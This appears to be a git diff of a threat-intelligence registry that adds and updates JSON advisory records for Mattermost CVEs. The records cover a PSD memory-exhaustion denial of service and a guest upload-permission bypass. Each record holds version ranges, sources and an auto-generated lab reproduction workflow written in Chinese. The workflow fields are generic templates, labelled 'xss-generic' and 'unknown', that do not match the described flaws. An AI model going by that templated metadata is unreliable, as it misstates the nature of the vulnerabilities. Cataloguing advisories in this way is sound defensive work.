"introduced=0, fixed<8.0.0-20260123215601-86797c508c44",
"introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260123215601-86797c508c44",
"5.3.2-0.20260123215601-86797c508c44",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-25780.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"file-upload-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260123215601-86797c508c44",
"introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260123215601-86797c508c44",
"5.3.2-0.20260123215601-86797c508c44",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260123215601-86797c508c44",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-25780",
"https://github.com/advisories/GHSA-xv2p-wchj-qjhp",
"https://github.com/mattermost/mattermost/commit/86797c508c444e299b20889ce241fde505a402cc",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123215601-86797c508c44"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-25780--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260123215601-86797c508c44, introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260123215601-86797c508c44",
"introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260123215601-86797c508c44, introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260123215601-86797c508c44`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-25780--workflow"
}
}

229
08-threat-intel/registry/advisories/mattermost--CVE-2026-26246.json 普通文件
查看文件

@@ -0,0 +1,229 @@
{
"canonical_id": "mattermost--CVE-2026-26246",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to bound memory allocation when processing PSD image files",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to bound memory allocation when processing PSD image files which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted PSD file. Mattermost Advisory ID: MMSA-2026-00572",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:08.918090Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26246",
"secondary_source_urls": [
"https://github.com/mattermost/mattermost/commit/38b413a27604e8721fbe008f8ec4b4e6c47ad4f0",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-26246",
"GO-2026-4727",
"GHSA-44mv-jq72-gj49"
],
"cve_ids": [
"CVE-2026-26246"
],
"ghsa_ids": [
"GHSA-44mv-jq72-gj49"
],
"osv_ids": [
"GHSA-44mv-jq72-gj49",
"GO-2026-4727"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260115183946-38b413a27604",
"introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260115183946-38b413a27604",
"5.3.2-0.20260115183946-38b413a27604",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-26246.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"file-upload-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260115183946-38b413a27604",
"introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260115183946-38b413a27604",
"5.3.2-0.20260115183946-38b413a27604",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260115183946-38b413a27604",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-26246",
"https://github.com/mattermost/mattermost/commit/38b413a27604e8721fbe008f8ec4b4e6c47ad4f0",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260115183946-38b413a27604"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-26246--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260115183946-38b413a27604, introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260115183946-38b413a27604",
"introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260115183946-38b413a27604, introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260115183946-38b413a27604`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-26246--workflow"
}
}

172
08-threat-intel/registry/advisories/mattermost--CVE-2026-4265.json
查看文件

@@ -4,44 +4,64 @@
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "MMSA-2025-00553",
"summary": "(CWE-284) Fixed an issue where guest users could bypass team-specific upload_file permission restrictions by uploading files in teams where they had permission and then posting those files to channels in teams where they lacked the permission. Thanks to 0x7oda7123 for contributing to this improvement under the Mattermost responsible disclosure policy.",
"published_at": "2026-03-16",
"updated_at": "2026-03-16",
"severity": "medium",
"cvss_score": null,
"title": "Mattermost fails to validate team-specific upload_file permissions",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to validate team-specific upload_file permissions which allows a guest user to post files in channels where they lack upload_file permission via uploading files in a team where they have permission and reusing the file metadata in a POST request to a different team. Mattermost Advisory ID: MMSA-2025-00553",
"published_at": "2026-03-16T15:30:46Z",
"updated_at": "2026-03-23T18:56:04.837800Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://securityupdates.mattermost.com/security_updates.json",
"secondary_source_urls": [],
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4265",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-xpvf-6qcc-9jqc",
"https://github.com/mattermost/mattermost/commit/c7f6efdfb035490f494b3177996ee5f4b278c988",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"MMSA-2025-00553",
"CVE-2026-4265"
"CVE-2026-4265",
"GO-2026-4749",
"GHSA-xpvf-6qcc-9jqc"
],
"cve_ids": [
"CVE-2026-4265"
],
"ghsa_ids": [],
"osv_ids": [],
"ghsa_ids": [
"GHSA-xpvf-6qcc-9jqc"
],
"osv_ids": [
"GHSA-xpvf-6qcc-9jqc",
"GO-2026-4749"
],
"affected_versions": [
"11.3.x <= 11.3.0",
"11.2.x <= 11.2.2",
"10.11.x <= 10.11.10"
"introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035",
"introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"11.4.0",
"11.3.1",
"8.0.0-20260107144005-c7f6efdfb035",
"5.3.2-0.20260107144005-c7f6efdfb035",
"10.11.11",
"11.2.3",
"10.11.11"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "Mattermost Server",
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-4265.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"file-upload-validation"
"file-upload-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
@@ -54,8 +74,8 @@
"official": true
},
{
"entity_id": "mattermost--project--mattermost-server",
"entity_type": "project",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
@@ -63,71 +83,93 @@
],
"affected_components": [
{
"name": "Mattermost Server",
"entity_id": "mattermost--project--mattermost-server",
"scope": "package",
"package_name": "Mattermost Server",
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"11.3.x <= 11.3.0",
"11.2.x <= 11.2.2",
"10.11.x <= 10.11.10"
"introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035",
"introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"11.4.0",
"11.3.1",
"8.0.0-20260107144005-c7f6efdfb035",
"5.3.2-0.20260107144005-c7f6efdfb035",
"10.11.11",
"11.2.3",
"10.11.11"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "10.11.x <= 10.11.10",
"patched_version": "11.4.0",
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260107144005-c7f6efdfb035",
"version_evidence_sources": [
"https://securityupdates.mattermost.com/security_updates.json"
"https://nvd.nist.gov/vuln/detail/CVE-2026-4265",
"https://github.com/advisories/GHSA-xpvf-6qcc-9jqc",
"https://github.com/mattermost/mattermost/commit/c7f6efdfb035490f494b3177996ee5f4b278c988",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--project--mattermost-server--11-3-x-11-3-0",
"mattermost--project--mattermost-server--11-2-x-11-2-2",
"mattermost--project--mattermost-server--10-11-x-10-11-10"
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--project--mattermost-server--11-4-0",
"mattermost--project--mattermost-server--11-3-1",
"mattermost--project--mattermost-server--11-2-3",
"mattermost--project--mattermost-server--10-11-11"
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--project--mattermost-server--11-4-0"
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107144005-c7f6efdfb035"
],
"version_sync_confidence": "high",
"advisory_scope": "package",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
